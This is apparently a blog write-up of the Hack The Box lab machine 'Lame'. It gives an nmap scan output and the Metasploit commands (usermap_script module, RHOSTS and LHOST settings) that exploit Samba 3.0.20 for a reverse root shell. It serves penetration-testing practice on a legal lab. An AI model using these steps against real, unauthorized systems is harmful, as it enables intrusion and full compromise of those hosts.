This is my 14th write up and I will be discussing my experience with the machine “Lame” from Hack The Box. Htb is a great platform for people who are starting out with penetration testing and want to sharpen their skills to take on the OSCP. This was a retired machine and can only be accessed with a VIP subscription which I highly recommend paying for. Lame was super easy in my opinion, exploits were widely available for the smb version detected landing you a root shell on the system.

Step 1: Enumeration

Kicked off an Nmap scan on this machine to see what ports/versions were exposed and decided there was no need for second scan type. It does not hurt to run two different types of Nmap scans because one scan may give you more results than the other depending on the flags used. The scan used default scripts -sC and version detection -sV.

sinner@kali:~$ nmap -sC -sV 10.10.10.3
[sudo] password for sinner:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-19 22:13 EDT
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Nmap scan report for 10.10.10.3
Host is up (0.12s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.13
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2h10m24s, deviation: 2h49m45s, median: 10m22s
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2021-04-19T22:23:49-04:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.20 seconds

I start from top to bottom when looking at my results and check for exploits on any versions presented for each open port. Nmap will spoon feed you some good information that may not even require fishing for an exploit. For example, we see that port 21 FTP is allowing anonymous logins without a password. Usually leads to some treasure but in this case it was a complete rabbit hole… I moved on to the next set of ports and noticed smb version 3.0.20. and googled it followed by the keywords “rapid 7 exploit” this gives you the direct steps for exploiting this service. There was also a manual exploit for this using a python script.

Step 2: Exploitation

Opened a terminal and typed the following steps to get this exploit up and running:

msfconsoleuse exploit/multi/samba/usermap_scriptset RHOSTS 10.10.10.3set LHOST tun0run

Lets talk a bit about some of these commands, if you are already familiar with metasploit feel free to skip this section. The first command “msfconsole” launches the metasploit console and loads a database of exploits written in ruby. The next line “use exploit/multi/samba/usermap_script” is specifying which exploit you want to use. If you type in “show options” it will give you details on what needs to be set for the exploit in order to run it. Some basic networking skills is needed in order to set the following next lines which is your targets IP and your IP that you want them to connect back to for a shell “set RHOSTS 10.10.10.3” “set LHOST tun0”. Once everything is set you can initiate the exploit with the “run” command.

Now we have a shell as root.

Grab your treasures by visiting the /root directory and since you are root anything can be obtained so gather that user flag also ;)

Web App Pen Tester 🦇 | https://github.com/SoftwareSinner